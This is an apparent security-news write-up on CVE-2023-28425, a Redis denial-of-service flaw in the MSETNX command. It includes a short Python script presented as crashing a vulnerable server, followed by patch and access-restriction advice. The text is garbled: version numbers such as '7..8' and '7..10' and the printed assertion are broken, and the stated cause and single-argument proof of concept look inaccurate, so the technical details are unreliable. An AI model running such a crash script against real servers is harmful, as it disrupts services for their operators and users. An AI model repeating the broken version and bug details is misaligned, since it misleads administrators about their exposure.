CVE CyberSecurity Database News

CVE-2023-28425 - Redis Denial of Service via MSETNX Command – How It Happens & How To Fix

Poster -

---

Introduction

Redis is a lightning-fast, in-memory database that can save its data to disk. It's used by tons of web applications for caching and more. But even popular software isn’t free from bugs. Let’s take a closer look at CVE-2023-28425, a vulnerability that let authenticated users easily crash the Redis server.

What Is MSETNX?

MSETNX is a Redis command that sets multiple keys to multiple values, but only if none of the keys exist. If any of the keys already exists, it doesn’t set any values.

MSETNX key1 value1 key2 value2 ...

This command is pretty straightforward—unless there’s a lurking bug.

The Vulnerability: What’s Wrong with MSETNX?

Starting in Redis 7..8, there was a new way MSETNX processed input. Under some circumstances, it failed to check the number of arguments properly. If a client sends an invalid format or wrong number of keys/values with MSETNX, a runtime assertion is triggered internally. Assertions are sanity checks inside the Redis code: if they fail, the server process is killed.

Result: Sending this buggy command instantly crashes the Redis server.

Who can do this attack?  
Anyone who can send commands to the server after authentication—which is quite broad in many deployments.

Exploit Details: How Attackers Can Crash Redis

All an attacker needs is a connection to Redis (plus auth, if required). They send MSETNX with the wrong number of arguments, and Redis shuts down.

Here’s a simple Python script to crash a vulnerable Redis instance

import redis

# Adjust host, port, and password as needed
r = redis.Redis(host='localhost', port=6379, password='yourpassword')

try:
    # Send MSETNX with missing value (invalid - triggers assertion in 7..8/7..9)
    r.execute_command('MSETNX', 'crashkey')
    print("Command sent!")
except Exception as e:
    print("Redis server crashed or disappeared:", e)

On the Redis side, you’ll see the process vanish, leaving you with a terminal like

*** FATAL: Assertion argc >= 4 && argc % 2 ==  failed at t_string.c:330

This denial-of-service is devastating: No persistence, no cleanup, just an instant crash.

The Fix

- The bug was patched in Redis 7..10 (Release Notes)

Upgrading

If you run an affected version, upgrade immediately to 7..10 or newer.

`

2. Follow official upgrade instructions

Mitigation Tips (If You Can’t Patch Yet)

- Restrict access: Make sure only trusted services or IPs can reach your Redis, especially if you use default ports.

References

- Redis Security Advisory for CVE-2023-28425
- Redis 7..10 Release Notes
- NVD Entry for CVE-2023-28425
- MSETNX Command Documentation

Always control access and monitor your services.

Redis is fast, but patching vulnerabilities must be even faster! Stay safe.

Timeline

Published on: 03/20/2023 20:15:00 UTC
Last modified on: 04/13/2023 17:15:00 UTC